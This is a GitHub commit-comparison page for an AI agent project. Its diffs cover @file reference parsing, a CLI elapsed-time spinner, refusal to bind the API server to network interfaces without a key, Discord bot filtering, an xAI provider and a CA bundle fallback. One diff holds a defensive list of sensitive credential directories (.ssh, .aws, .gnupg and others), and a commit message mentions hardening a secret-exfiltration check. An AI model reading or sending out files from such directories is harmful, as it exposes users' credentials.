Compare commits

..

27 Commits

Author SHA1 Message Date
Mariano Nicolini
c45d18265c fix tests 2026-04-10 18:59:35 -03:00
Mariano Nicolini
1c6d144a10 Merge branch 'main' into api-server-enforce-key 2026-04-10 18:47:59 -03:00
Teknium
496e378b10 fix: resolve overlay provider slug mismatch in /model picker (#7373)
HERMES_OVERLAYS keys use models.dev IDs (e.g. 'github-copilot') but
_PROVIDER_MODELS curated lists and config.yaml use Hermes provider IDs
('copilot'). list_authenticated_providers() Section 2 was using the
overlay key directly for model lookups and is_current checks, causing:
- 0 models shown for copilot, kimi, kilo, opencode, vercel
- is_current never matching the config provider

Fix: build reverse mapping from PROVIDER_TO_MODELS_DEV to translate
overlay keys to Hermes slugs before curated list lookup and result
construction. Also adds 'kimi-for-coding' alias in auth.py so the
picker's returned slug resolves correctly in resolve_provider().

Fixes #5223. Based on work by HearthCore (#6492) and linxule (#6287).

Co-authored-by: HearthCore <HearthCore@users.noreply.github.com>
Co-authored-by: linxule <linxule@users.noreply.github.com>
2026-04-10 14:46:57 -07:00
Shannon Sands
03f23f10e1 feat: multi-agent Discord filtering — skip messages addressed to other bots
Replace the simple DISCORD_IGNORE_NO_MENTION check with bot-aware
multi-agent filtering. When multiple agents share a channel:

- If other bots are @mentioned but this bot is not → stay silent
- If only humans are mentioned but not this bot → stay silent
- Messages with no mentions still flow to _handle_message for the
  existing DISCORD_REQUIRE_MENTION check
- DMs are unaffected (always handled)

This prevents both agents from responding when only one is addressed.
2026-04-11 07:46:44 +10:00
Mariano Nicolini
2b4abf8d9c move is_network_accessible helper to base.py 2026-04-10 18:36:19 -03:00
Julien Talbot
8bcb8b8e87 feat(providers): add native xAI provider
Adds xAI as a first-class provider: ProviderConfig in auth.py,
HermesOverlay in providers.py, 11 curated Grok models, URL mapping
in model_metadata.py, aliases (x-ai, x.ai), and env var tests.
Uses standard OpenAI-compatible chat completions.

Closes #7050
2026-04-10 13:40:38 -07:00
0xbyt4
f07b35acba fix: use raw docstring to suppress invalid escape sequence warning 2026-04-10 13:39:30 -07:00
Teknium
363d5d57be test: update schema assertion after maxItems removal 2026-04-10 13:38:14 -07:00
angelos
7ccdb74364 fix(delegate): make max_concurrent_children configurable + error on excess
`delegate_task` silently truncated batch tasks to 3 — the model sends
5 tasks, gets results for 3, never told 2 were dropped. Now returns a
clear tool_error explaining the limit and how to fix it.

The limit is configurable via:
  - delegation.max_concurrent_children in config.yaml (priority 1)
  - DELEGATION_MAX_CONCURRENT_CHILDREN env var (priority 2)
  - default: 3

Uses the same _load_config() path as the rest of delegate_task for
consistent config priority. Clamps to min 1, warns on non-integer
config values.

Also removes the hardcoded maxItems: 3 from the JSON schema — the
schema was blocking the model from even attempting >3 tasks before
the runtime check could fire. The runtime check gives a much more
actionable error message.

Backwards compatible: default remains 3, existing configs unchanged.
2026-04-10 13:38:14 -07:00
Tranquil-Flow
6c115440fd fix(delegate): sync self.base_url with client_kwargs after credential resolution
When delegation.base_url routes subagents to a different endpoint, the
correct URL was passed through _resolve_delegation_credentials() and
_build_child_agent() into AIAgent.__init__(), but self.base_url could
fall out of sync with client_kwargs["base_url"] — the value the OpenAI
client actually uses.

This caused billing_base_url in session records to show the parent's
endpoint while actual API calls went to the correct delegation target.

Keep self.base_url in sync with client_kwargs after the credential
resolution block, matching the existing pattern for self.api_key.

Fixes #6825
2026-04-10 13:38:14 -07:00
Teknium
4fb42d0193 fix: per-profile subprocess HOME isolation (#4426) (#7357)
Isolate system tool configs (git, ssh, gh, npm) per profile by injecting
a per-profile HOME into subprocess environments only.  The Python
process's own os.environ['HOME'] and Path.home() are never modified,
preserving all existing profile infrastructure.

Activation is directory-based: when {HERMES_HOME}/home/ exists on disk,
subprocesses see it as HOME.  The directory is created automatically for:
- Docker: entrypoint.sh bootstraps it inside the persistent volume
- Named profiles: added to _PROFILE_DIRS in profiles.py

Injection points (all three subprocess env builders):
- tools/environments/local.py _make_run_env() — foreground terminal
- tools/environments/local.py _sanitize_subprocess_env() — background procs
- tools/code_execution_tool.py child_env — execute_code sandbox

Single source of truth: hermes_constants.get_subprocess_home()

Closes #4426
2026-04-10 13:37:45 -07:00
Teknium
f83e86d826 feat(cli): restore live per-tool elapsed timer in TUI spinner (#7359)
Brings back the live elapsed time counter that was lost when the CLI
transitioned from raw KawaiiSpinner animation to prompt_toolkit TUI.

The original implementation (Feb 2026) used KawaiiSpinner per tool call
with \r-based animation showing '(4.2s)' ticking up live. When
patch_stdout was introduced, the \r animation was disabled and replaced
with a static _spinner_text widget that only showed the tool name.

Now the spinner widget shows elapsed time again:
  💻 git log --oneline  (3.2s)

Implementation:
- Track _tool_start_time (monotonic) on tool.started events
- Clear it on tool.completed and thinking transitions
- get_spinner_text() computes live elapsed on each TUI repaint
- The existing poll loop already invalidates every ~0.15s, so no
  extra timer thread is needed

Addresses #4287.
2026-04-10 13:09:41 -07:00
0xbyt4
0bea603510 fix: handle NoneType request_overrides in fast_mode check (#7350) 2026-04-10 13:07:25 -07:00
Teknium
360b21ce95 fix(gateway): reject file paths in get_command() + file-drop tests (#7356)
Gateway get_command() now rejects paths containing /. Also adds 28 _detect_file_drop regression tests. From #6978 (@ygd58) and #6963 (@betamod).
2026-04-10 13:06:02 -07:00
kshitijk4poor
37a1c75716 fix(browser): hardening — dead code, caching, scroll perf, security, thread safety
Salvaged from PR #7276 (hardening-only subset; excluded 6 new tools
and unrelated scope additions from the contributor's commit).

- Remove dead DEFAULT_SESSION_TIMEOUT and unregistered browser_close schema
- Fix _camofox_eval wrong call signatures (_ensure_tab, _post args)
- Cache _find_agent_browser, _get_command_timeout, _discover_homebrew_node_dirs
- Replace 5x subprocess scroll loop with single pixel-arg call
- URL-decode before secret exfiltration check (bypass prevention)
- Protect _recording_sessions with _cleanup_lock (thread safety)
- Return failure on empty stdout instead of silent success
- Structure-aware _truncate_snapshot (cut at line boundaries)

Follow-up improvements over contributor's original:
- Move _EMPTY_OK_COMMANDS to module-level frozenset (avoid per-call allocation)
- Fix list+tuple concat in _run_browser_command PATH construction
- Update test_browser_homebrew_paths.py for tuple returns and cache fixtures

Co-authored-by: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com>
Closes #7168, closes #7171, closes #7172, closes #7173
2026-04-10 13:05:44 -07:00
WAXLYY
c6e1add6f1 fix(agent): preserve quoted @file references with spaces 2026-04-10 13:05:01 -07:00
Hermes Audit
2c99b4e79b fix(unicode): sanitize surrogate metadata and allow two-pass retry 2026-04-10 13:05:01 -07:00
Hermes Audit
71036a7a75 fix: handle UnicodeEncodeError with ASCII codec (#6843)
Broaden the UnicodeEncodeError recovery to handle systems with ASCII-only
locale (LANG=C, Chromebooks) where ANY non-ASCII character causes encoding
failure, not just lone surrogates.

Changes:
- Add _strip_non_ascii() and _sanitize_messages_non_ascii() helpers that
  strip all non-ASCII characters from message content, name, and tool_calls
- Update the UnicodeEncodeError handler to detect ASCII codec errors and
  fall back to non-ASCII sanitization after surrogate check fails
- Sanitize tool_calls arguments and name fields (not just content)
- Fix bare .encode() in cli.py suspend handler to use explicit utf-8
- Add comprehensive test suite (17 tests)
2026-04-10 13:05:01 -07:00
Teknium
7e28b7b5d5 fix: parallelize skills browse/search to prevent hanging (#7301)
hermes skills browse ran all 7 source adapters serially with no overall
timeout and no progress indicator. On a cold cache, GitHubSource alone
could make 100+ sequential HTTP calls (directory listing + inspect per
skill per tap), taking 5+ minutes with no output — appearing to hang.

Changes:
- Add parallel_search_sources() in tools/skills_hub.py that runs all
  source adapters concurrently via ThreadPoolExecutor with a 30s
  overall timeout. Sources that finish in time contribute results;
  slow ones are skipped gracefully with a visible notice.
- Update unified_search() to use parallel_search_sources() internally.
- Update do_browse() and do_search() in hermes_cli/skills_hub.py to
  show a Rich spinner while fetching, so the user sees activity.
- Bump per-source limits (clawhub 50→500, lobehub 50→500, etc.) now
  that fetching is parallel — yields far more results per browse.
- Report timed-out sources and suggest re-running for cached results.
- Replace 'inspect/install' footer with 'search deeper' tip.

Worst-case latency drops from 5+ minutes (serial) to ~30s (parallel
with timeout cap). Result count should jump from ~242 to 1000+.
2026-04-10 12:54:18 -07:00
Teknium
a093eb47f7 fix: propagate child activity to parent during delegate_task (#7295)
When delegate_task runs, the parent agent's activity tracker freezes
because child.run_conversation() blocks and the child's own
_touch_activity() never propagates back to the parent. The gateway
inactivity timeout then fires a spurious 'No activity' warning and
eventually kills the agent, even though the subagent is actively working.

Fix: add a heartbeat thread in _run_single_child that calls
parent._touch_activity() every 30 seconds with detail from the child's
activity summary (current tool, iteration count). The thread is a daemon
that starts before child.run_conversation() and is cleaned up in the
finally block.

This also improves the gateway 'Still working...' status messages —
instead of just 'running: delegate_task', users now see what the
subagent is actually doing (e.g., 'delegate_task: subagent running
terminal (iteration 5/50)').
2026-04-10 12:51:30 -07:00
Teknium
f72faf191c fix: fall back to default certs when CA bundle path doesn't exist (#7352)
_resolve_verify() returned stale CA bundle paths from auth.json without
checking if the file exists. When a user logs into Nous Portal on their
host (where SSL_CERT_FILE points to a valid cert), that path gets
persisted in auth.json. Running hermes model later in Docker where the
host path doesn't exist caused FileNotFoundError bubbling up as
'Could not verify credentials: [Errno 2] No such file or directory'.

Now _resolve_verify validates the path exists before returning it. If
missing, logs a warning and falls back to True (default certifi-based
TLS verification).
2026-04-10 12:51:19 -07:00
Mariano Nicolini
f8dbe0ffd1 Merge branch 'main' into api-server-enforce-key 2026-04-10 11:14:20 -03:00
Mariano Nicolini
42e7755d4c Merge branch 'main' into api-server-enforce-key 2026-04-09 21:12:02 -03:00
Mariano Nicolini
68954b7c03 add helper function to check if host is network accessible and add tests for that function 2026-04-09 21:10:24 -03:00
Mariano Nicolini
95220facdf Merge branch 'main' into api-server-enforce-key 2026-04-09 17:20:30 -03:00
Mariano Nicolini
5ea9bf70de update code comments and documentation 2026-04-09 14:59:44 -03:00
Mariano Nicolini
67e4d43ea1 enforce api key when interface is not loopback 2026-04-09 14:29:44 -03:00
37 changed files with 2042 additions and 586 deletions

View File

@@ -13,8 +13,9 @@ from typing import Awaitable, Callable
from agent.model_metadata import estimate_tokens_rough
_QUOTED_REFERENCE_VALUE = r'(?:`[^`\n]+`|"[^"\n]+"|\'[^\'\n]+\')'
REFERENCE_PATTERN = re.compile(
r"(?<![\w/])@(?:(?P<simple>diff|staged)\b|(?P<kind>file|folder|git|url):(?P<value>\S+))"
rf"(?<![\w/])@(?:(?P<simple>diff|staged)\b|(?P<kind>file|folder|git|url):(?P<value>{_QUOTED_REFERENCE_VALUE}(?::\d+(?:-\d+)?)?|\S+))"
)
TRAILING_PUNCTUATION = ",.;!?"
_SENSITIVE_HOME_DIRS = (".ssh", ".aws", ".gnupg", ".kube", ".docker", ".azure", ".config/gh")
@@ -81,14 +82,10 @@ def parse_context_references(message: str) -> list[ContextReference]:
value = _strip_trailing_punctuation(match.group("value") or "")
line_start = None
line_end = None
target = value
target = _strip_reference_wrappers(value)
if kind == "file":
range_match = re.match(r"^(?P<path>.+?):(?P<start>\d+)(?:-(?P<end>\d+))?$", value)
if range_match:
target = range_match.group("path")
line_start = int(range_match.group("start"))
line_end = int(range_match.group("end") or range_match.group("start"))
target, line_start, line_end = _parse_file_reference_value(value)
refs.append(
ContextReference(
@@ -375,6 +372,38 @@ def _strip_trailing_punctuation(value: str) -> str:
return stripped
def _strip_reference_wrappers(value: str) -> str:
if len(value) >= 2 and value[0] == value[-1] and value[0] in "`\"'":
return value[1:-1]
return value
def _parse_file_reference_value(value: str) -> tuple[str, int | None, int | None]:
quoted_match = re.match(
r'^(?P<quote>`|"|\')(?P<path>.+?)(?P=quote)(?::(?P<start>\d+)(?:-(?P<end>\d+))?)?$',
value,
)
if quoted_match:
line_start = quoted_match.group("start")
line_end = quoted_match.group("end")
return (
quoted_match.group("path"),
int(line_start) if line_start is not None else None,
int(line_end or line_start) if line_start is not None else None,
)
range_match = re.match(r"^(?P<path>.+?):(?P<start>\d+)(?:-(?P<end>\d+))?$", value)
if range_match:
line_start = int(range_match.group("start"))
return (
range_match.group("path"),
line_start,
int(range_match.group("end") or range_match.group("start")),
)
return _strip_reference_wrappers(value), None, None
def _remove_reference_tokens(message: str, refs: list[ContextReference]) -> str:
pieces: list[str] = []
cursor = 0

View File

@@ -213,6 +213,7 @@ _URL_TO_PROVIDER: Dict[str, str] = {
"models.github.ai": "copilot",
"api.fireworks.ai": "fireworks",
"opencode.ai": "opencode-go",
"api.x.ai": "xai",
}

30
cli.py
View File

@@ -1048,7 +1048,7 @@ def _termux_example_image_path(filename: str = "cat.png") -> str:
def _split_path_input(raw: str) -> tuple[str, str]:
"""Split a leading file path token from trailing free-form text.
r"""Split a leading file path token from trailing free-form text.
Supports quoted paths and backslash-escaped spaces so callers can accept
inputs like:
@@ -1719,6 +1719,7 @@ class HermesCLI:
self._secret_state = None
self._secret_deadline = 0
self._spinner_text: str = "" # thinking spinner text for TUI
self._tool_start_time: float = 0.0 # monotonic timestamp when current tool started (for live elapsed)
self._command_running = False
self._command_status = ""
self._attached_images: list[Path] = []
@@ -2130,6 +2131,7 @@ class HermesCLI:
if not text:
self._flush_reasoning_preview(force=True)
self._spinner_text = text or ""
self._tool_start_time = 0.0 # clear tool timer when switching to thinking
self._invalidate()
# ── Streaming display ────────────────────────────────────────────────
@@ -6145,11 +6147,20 @@ class HermesCLI:
Updates the TUI spinner widget so the user can see what the agent
is doing during tool execution (fills the gap between thinking
spinner and next response). Also plays audio cue in voice mode.
On tool.started, records a monotonic timestamp so get_spinner_text()
can show a live elapsed timer (the TUI poll loop already invalidates
every ~0.15s, so the counter updates automatically).
"""
# Only act on tool.started; ignore tool.completed, reasoning.available, etc.
if event_type == "tool.completed":
import time as _time
self._tool_start_time = 0.0
self._invalidate()
return
if event_type != "tool.started":
return
if function_name and not function_name.startswith("_"):
import time as _time
from agent.display import get_tool_emoji
emoji = get_tool_emoji(function_name)
label = preview or function_name
@@ -6158,6 +6169,7 @@ class HermesCLI:
if _pl > 0 and len(label) > _pl:
label = label[:_pl - 3] + "..."
self._spinner_text = f"{emoji} {label}"
self._tool_start_time = _time.monotonic()
self._invalidate()
if not self._voice_mode:
@@ -7999,7 +8011,7 @@ class HermesCLI:
agent_name = get_active_skin().get_branding("agent_name", "Hermes Agent")
msg = f"\n{agent_name} has been suspended. Run `fg` to bring {agent_name} back."
def _suspend():
os.write(1, msg.encode())
os.write(1, msg.encode("utf-8", errors="replace"))
os.kill(0, _sig.SIGTSTP)
run_in_terminal(_suspend)
@@ -8359,6 +8371,17 @@ class HermesCLI:
txt = cli_ref._spinner_text
if not txt:
return []
# Append live elapsed timer when a tool is running
t0 = cli_ref._tool_start_time
if t0 > 0:
import time as _time
elapsed = _time.monotonic() - t0
if elapsed >= 60:
_m, _s = int(elapsed // 60), int(elapsed % 60)
elapsed_str = f"{_m}m {_s}s"
else:
elapsed_str = f"{elapsed:.1f}s"
return [('class:hint', f' {txt} ({elapsed_str})')]
return [('class:hint', f' {txt}')]
def get_spinner_height():
@@ -8893,6 +8916,7 @@ class HermesCLI:
finally:
self._agent_running = False
self._spinner_text = ""
self._tool_start_time = 0.0
app.invalidate() # Refresh status line

View File

@@ -9,7 +9,10 @@ INSTALL_DIR="/opt/hermes"
# (cache/images, cache/audio, platforms/whatsapp, etc.) are created on
# demand by the application — don't pre-create them here so new installs
# get the consolidated layout from get_hermes_dir().
mkdir -p "$HERMES_HOME"/{cron,sessions,logs,hooks,memories,skills}
# The "home/" subdirectory is a per-profile HOME for subprocesses (git,
# ssh, gh, npm …). Without it those tools write to /root which is
# ephemeral and shared across profiles. See issue #4426.
mkdir -p "$HERMES_HOME"/{cron,sessions,logs,hooks,memories,skills,home}
# .env
if [ ! -f "$HERMES_HOME/.env" ]; then

View File

@@ -25,6 +25,7 @@ import hmac
import json
import logging
import os
import socket as _socket
import re
import sqlite3
import time
@@ -42,6 +43,7 @@ from gateway.config import Platform, PlatformConfig
from gateway.platforms.base import (
BasePlatformAdapter,
SendResult,
is_network_accessible,
)
logger = logging.getLogger(__name__)
@@ -53,6 +55,7 @@ MAX_STORED_RESPONSES = 100
MAX_REQUEST_BYTES = 1_000_000 # 1 MB default limit for POST bodies
def check_api_server_requirements() -> bool:
"""Check if API server dependencies are available."""
return AIOHTTP_AVAILABLE
@@ -406,7 +409,8 @@ class APIServerAdapter(BasePlatformAdapter):
Validate Bearer token from Authorization header.
Returns None if auth is OK, or a 401 web.Response on failure.
If no API key is configured, all requests are allowed.
If no API key is configured, all requests are allowed (only when API
server is local)
"""
if not self._api_key:
return None # No key configured — allow all (local-only use)
@@ -1713,8 +1717,16 @@ class APIServerAdapter(BasePlatformAdapter):
if hasattr(sweep_task, "add_done_callback"):
sweep_task.add_done_callback(self._background_tasks.discard)
# Refuse to start network-accessible without authentication
if is_network_accessible(self._host) and not self._api_key:
logger.error(
"[%s] Refusing to start: binding to %s requires API_SERVER_KEY. "
"Set API_SERVER_KEY or use the default 127.0.0.1.",
self.name, self._host,
)
return False
# Port conflict detection — fail fast if port is already in use
import socket as _socket
try:
with _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM) as _s:
_s.settimeout(1)

View File

@@ -6,10 +6,12 @@ and implement the required methods.
"""
import asyncio
import ipaddress
import logging
import os
import random
import re
import socket as _socket
import subprocess
import sys
import uuid
@@ -19,6 +21,41 @@ from urllib.parse import urlsplit
logger = logging.getLogger(__name__)
def is_network_accessible(host: str) -> bool:
"""Return True if *host* would expose the server beyond loopback.
Loopback addresses (127.0.0.1, ::1, IPv4-mapped ::ffff:127.0.0.1)
are local-only. Unspecified addresses (0.0.0.0, ::) bind all
interfaces. Hostnames are resolved; DNS failure fails closed.
"""
try:
addr = ipaddress.ip_address(host)
if addr.is_loopback:
return False
# ::ffff:127.0.0.1 — Python reports is_loopback=False for mapped
# addresses, so check the underlying IPv4 explicitly.
if getattr(addr, "ipv4_mapped", None) and addr.ipv4_mapped.is_loopback:
return False
return True
except ValueError:
# when host variable is a hostname, we should try to resolve below
pass
try:
resolved = _socket.getaddrinfo(
host, None, _socket.AF_UNSPEC, _socket.SOCK_STREAM,
)
# if the hostname resolves into at least one non-loopback address,
# then we consider it to be network accessible
for _family, _type, _proto, _canonname, sockaddr in resolved:
addr = ipaddress.ip_address(sockaddr[0])
if not addr.is_loopback:
return True
return False
except (_socket.gaierror, OSError):
return True
def _detect_macos_system_proxy() -> str | None:
"""Read the macOS system HTTP(S) proxy via ``scutil --proxy``.
@@ -613,6 +650,9 @@ class MessageEvent:
raw = parts[0][1:].lower() if parts else None
if raw and "@" in raw:
raw = raw.split("@", 1)[0]
# Reject file paths: valid command names never contain /
if raw and "/" in raw:
return None
return raw
def get_command_args(self) -> str:

View File

@@ -606,22 +606,35 @@ class DiscordAdapter(BasePlatformAdapter):
if not self._client.user or self._client.user not in message.mentions:
return
# "all" falls through to handle_message
# If the message @mentions other users but NOT the bot, the
# sender is talking to someone else — stay silent. Only
# applies in server channels; in DMs the user is always
# talking to the bot (mentions are just references).
# Controlled by DISCORD_IGNORE_NO_MENTION (default: true).
_ignore_no_mention = os.getenv(
"DISCORD_IGNORE_NO_MENTION", "true"
).lower() in ("true", "1", "yes")
if _ignore_no_mention and message.mentions and not isinstance(message.channel, discord.DMChannel):
_bot_mentioned = (
# Multi-agent filtering: if the message mentions specific bots
# but NOT this bot, the sender is talking to another agent —
# stay silent. Messages with no bot mentions (general chat)
# still fall through to _handle_message for the existing
# DISCORD_REQUIRE_MENTION check.
#
# This replaces the older DISCORD_IGNORE_NO_MENTION logic
# with bot-aware filtering that works correctly when multiple
# agents share a channel.
if not isinstance(message.channel, discord.DMChannel) and message.mentions:
_self_mentioned = (
self._client.user is not None
and self._client.user in message.mentions
)
if not _bot_mentioned:
return # Talking to someone else, don't interrupt
_other_bots_mentioned = any(
m.bot and m != self._client.user
for m in message.mentions
)
# If other bots are mentioned but we're not → not for us
if _other_bots_mentioned and not _self_mentioned:
return
# If humans are mentioned but we're not → not for us
# (preserves old DISCORD_IGNORE_NO_MENTION=true behavior)
_ignore_no_mention = os.getenv(
"DISCORD_IGNORE_NO_MENTION", "true"
).lower() in ("true", "1", "yes")
if _ignore_no_mention and not _self_mentioned and not _other_bots_mentioned:
return
await self._handle_message(message)

View File

@@ -1348,28 +1348,12 @@ class GatewayRunner:
for key, entry in _expired_entries:
try:
await self._async_flush_memories(entry.session_id)
# Shut down memory provider and close tool resources
# on the cached agent. Idle agents live in
# _agent_cache (not _running_agents), so look there.
_cached_agent = None
_cache_lock = getattr(self, "_agent_cache_lock", None)
if _cache_lock is not None:
with _cache_lock:
_cached = self._agent_cache.get(key)
_cached_agent = _cached[0] if isinstance(_cached, tuple) else _cached if _cached else None
# Fall back to _running_agents in case the agent is
# still mid-turn when the expiry fires.
if _cached_agent is None:
_cached_agent = self._running_agents.get(key)
if _cached_agent and _cached_agent is not _AGENT_PENDING_SENTINEL:
# Shut down memory provider on the cached agent
cached_agent = self._running_agents.get(key)
if cached_agent and cached_agent is not _AGENT_PENDING_SENTINEL:
try:
if hasattr(_cached_agent, 'shutdown_memory_provider'):
_cached_agent.shutdown_memory_provider()
except Exception:
pass
try:
if hasattr(_cached_agent, 'close'):
_cached_agent.close()
if hasattr(cached_agent, 'shutdown_memory_provider'):
cached_agent.shutdown_memory_provider()
except Exception:
pass
# Mark as flushed and persist to disk so the flag
@@ -1552,14 +1536,6 @@ class GatewayRunner:
agent.shutdown_memory_provider()
except Exception:
pass
# Close tool resources (terminal sandboxes, browser daemons,
# background processes, httpx clients) to prevent zombie
# process accumulation.
try:
if hasattr(agent, 'close'):
agent.close()
except Exception:
pass
for platform, adapter in list(self.adapters.items()):
try:
@@ -1582,25 +1558,7 @@ class GatewayRunner:
self._pending_messages.clear()
self._pending_approvals.clear()
self._shutdown_event.set()
# Global cleanup: kill any remaining tool subprocesses not tied
# to a specific agent (catch-all for zombie prevention).
try:
from tools.process_registry import process_registry
process_registry.kill_all()
except Exception:
pass
try:
from tools.terminal_tool import cleanup_all_environments
cleanup_all_environments()
except Exception:
pass
try:
from tools.browser_tool import cleanup_all_browsers
cleanup_all_browsers()
except Exception:
pass
from gateway.status import remove_pid_file, write_runtime_status
remove_pid_file()
try:
@@ -3377,22 +3335,8 @@ class GatewayRunner:
_flush_task.add_done_callback(self._background_tasks.discard)
except Exception as e:
logger.debug("Gateway memory flush on reset failed: %s", e)
# Close tool resources on the old agent (terminal sandboxes, browser
# daemons, background processes) before evicting from cache.
# Guard with getattr because test fixtures may skip __init__.
_cache_lock = getattr(self, "_agent_cache_lock", None)
if _cache_lock is not None:
with _cache_lock:
_cached = self._agent_cache.get(session_key)
_old_agent = _cached[0] if isinstance(_cached, tuple) else _cached if _cached else None
if _old_agent is not None:
try:
if hasattr(_old_agent, "close"):
_old_agent.close()
except Exception:
pass
self._evict_cached_agent(session_key)
try:
from tools.env_passthrough import clear_env_passthrough
clear_env_passthrough()

View File

@@ -198,6 +198,14 @@ PROVIDER_REGISTRY: Dict[str, ProviderConfig] = {
api_key_env_vars=("DEEPSEEK_API_KEY",),
base_url_env_var="DEEPSEEK_BASE_URL",
),
"xai": ProviderConfig(
id="xai",
name="xAI",
auth_type="api_key",
inference_base_url="https://api.x.ai/v1",
api_key_env_vars=("XAI_API_KEY",),
base_url_env_var="XAI_BASE_URL",
),
"ai-gateway": ProviderConfig(
id="ai-gateway",
name="AI Gateway",
@@ -890,7 +898,7 @@ def resolve_provider(
_PROVIDER_ALIASES = {
"glm": "zai", "z-ai": "zai", "z.ai": "zai", "zhipu": "zai",
"google": "gemini", "google-gemini": "gemini", "google-ai-studio": "gemini",
"kimi": "kimi-coding", "moonshot": "kimi-coding",
"kimi": "kimi-coding", "kimi-for-coding": "kimi-coding", "moonshot": "kimi-coding",
"minimax-china": "minimax-cn", "minimax_cn": "minimax-cn",
"claude": "anthropic", "claude-code": "anthropic",
"github": "copilot", "github-copilot": "copilot",
@@ -1513,7 +1521,15 @@ def _resolve_verify(
if effective_insecure:
return False
if effective_ca:
return str(effective_ca)
ca_path = str(effective_ca)
if not os.path.isfile(ca_path):
import logging
logging.getLogger("hermes.auth").warning(
"CA bundle path does not exist: %s — falling back to default certificates",
ca_path,
)
return True
return ca_path
return True

View File

@@ -1209,8 +1209,8 @@ OPTIONAL_ENV_VARS = {
"advanced": True,
},
"API_SERVER_KEY": {
"description": "Bearer token for API server authentication. If empty, all requests are allowed (local use only).",
"prompt": "API server auth key (optional)",
"description": "Bearer token for API server authentication. Required for non-loopback binding; server refuses to start without it. On loopback (127.0.0.1), all requests are allowed if empty.",
"prompt": "API server auth key (required for network access)",
"url": None,
"password": True,
"category": "messaging",
@@ -1225,7 +1225,7 @@ OPTIONAL_ENV_VARS = {
"advanced": True,
},
"API_SERVER_HOST": {
"description": "Host/bind address for the API server (default: 127.0.0.1). Use 0.0.0.0 for network access — requires API_SERVER_KEY for security.",
"description": "Host/bind address for the API server (default: 127.0.0.1). Use 0.0.0.0 for network access — server refuses to start without API_SERVER_KEY.",
"prompt": "API server host",
"url": None,
"password": False,

View File

@@ -812,45 +812,66 @@ def list_authenticated_providers(
# --- 2. Check Hermes-only providers (nous, openai-codex, copilot, opencode-go) ---
from hermes_cli.providers import HERMES_OVERLAYS
from hermes_cli.auth import PROVIDER_REGISTRY as _auth_registry
# Build reverse mapping: models.dev ID → Hermes provider ID.
# HERMES_OVERLAYS keys may be models.dev IDs (e.g. "github-copilot")
# while _PROVIDER_MODELS and config.yaml use Hermes IDs ("copilot").
_mdev_to_hermes = {v: k for k, v in PROVIDER_TO_MODELS_DEV.items()}
for pid, overlay in HERMES_OVERLAYS.items():
if pid in seen_slugs:
continue
# Resolve Hermes slug — e.g. "github-copilot" → "copilot"
hermes_slug = _mdev_to_hermes.get(pid, pid)
if hermes_slug in seen_slugs:
continue
# Check if credentials exist
has_creds = False
if overlay.extra_env_vars:
has_creds = any(os.environ.get(ev) for ev in overlay.extra_env_vars)
# Also check api_key_env_vars from PROVIDER_REGISTRY for api_key auth_type
if not has_creds and overlay.auth_type == "api_key":
pcfg = _auth_registry.get(pid)
if pcfg and pcfg.api_key_env_vars:
has_creds = any(os.environ.get(ev) for ev in pcfg.api_key_env_vars)
if overlay.auth_type in ("oauth_device_code", "oauth_external", "external_process"):
for _key in (pid, hermes_slug):
pcfg = _auth_registry.get(_key)
if pcfg and pcfg.api_key_env_vars:
if any(os.environ.get(ev) for ev in pcfg.api_key_env_vars):
has_creds = True
break
if not has_creds and overlay.auth_type in ("oauth_device_code", "oauth_external", "external_process"):
# These use auth stores, not env vars — check for auth.json entries
try:
from hermes_cli.auth import _load_auth_store
store = _load_auth_store()
if store and (pid in store.get("providers", {}) or pid in store.get("credential_pool", {})):
providers_store = store.get("providers", {})
pool_store = store.get("credential_pool", {})
if store and (
pid in providers_store or hermes_slug in providers_store
or pid in pool_store or hermes_slug in pool_store
):
has_creds = True
except Exception as exc:
logger.debug("Auth store check failed for %s: %s", pid, exc)
if not has_creds:
continue
# Use curated list
model_ids = curated.get(pid, [])
# Use curated list — look up by Hermes slug, fall back to overlay key
model_ids = curated.get(hermes_slug, []) or curated.get(pid, [])
total = len(model_ids)
top = model_ids[:max_models]
results.append({
"slug": pid,
"name": get_label(pid),
"is_current": pid == current_provider,
"slug": hermes_slug,
"name": get_label(hermes_slug),
"is_current": hermes_slug == current_provider or pid == current_provider,
"is_user_defined": False,
"models": top,
"total_models": total,
"source": "hermes",
})
seen_slugs.add(pid)
seen_slugs.add(hermes_slug)
# --- 3. User-defined endpoints from config ---
if user_providers and isinstance(user_providers, dict):

View File

@@ -129,6 +129,19 @@ _PROVIDER_MODELS: dict[str, list[str]] = {
"glm-4.5",
"glm-4.5-flash",
],
"xai": [
"grok-4.20-0309-reasoning",
"grok-4.20-0309-non-reasoning",
"grok-4.20-multi-agent-0309",
"grok-4-1-fast-reasoning",
"grok-4-1-fast-non-reasoning",
"grok-4-fast-reasoning",
"grok-4-fast-non-reasoning",
"grok-4-0709",
"grok-code-fast-1",
"grok-3",
"grok-3-mini",
],
"kimi-coding": [
"kimi-for-coding",
"kimi-k2.5",

View File

@@ -42,6 +42,11 @@ _PROFILE_DIRS = [
"plans",
"workspace",
"cron",
# Per-profile HOME for subprocesses: isolates system tool configs (git,
# ssh, gh, npm …) so credentials don't bleed between profiles. In Docker
# this also ensures tool configs land inside the persistent volume.
# See hermes_constants.get_subprocess_home() and issue #4426.
"home",
]
# Files copied during --clone (if they exist in the source)

View File

@@ -127,6 +127,11 @@ HERMES_OVERLAYS: Dict[str, HermesOverlay] = {
is_aggregator=True,
base_url_env_var="HF_BASE_URL",
),
"xai": HermesOverlay(
transport="openai_chat",
base_url_override="https://api.x.ai/v1",
base_url_env_var="XAI_BASE_URL",
),
}
@@ -163,6 +168,10 @@ ALIASES: Dict[str, str] = {
"z.ai": "zai",
"zhipu": "zai",
# xai
"x-ai": "xai",
"x.ai": "xai",
# kimi-for-coding (models.dev ID)
"kimi": "kimi-for-coding",
"kimi-coding": "kimi-for-coding",
@@ -341,6 +350,7 @@ def get_label(provider_id: str) -> str:
def is_aggregator(provider: str) -> bool:
"""Return True when the provider is a multi-model aggregator."""
pdef = get_provider(provider)

View File

@@ -151,7 +151,8 @@ def do_search(query: str, source: str = "all", limit: int = 10,
auth = GitHubAuth()
sources = create_source_router(auth)
results = unified_search(query, sources, source_filter=source, limit=limit)
with c.status("[bold]Searching registries..."):
results = unified_search(query, sources, source_filter=source, limit=limit)
if not results:
c.print("[dim]No skills found matching your query.[/]\n")
@@ -187,7 +188,7 @@ def do_browse(page: int = 1, page_size: int = 20, source: str = "all",
Official skills are always shown first, regardless of source filter.
"""
from tools.skills_hub import (
GitHubAuth, create_source_router,
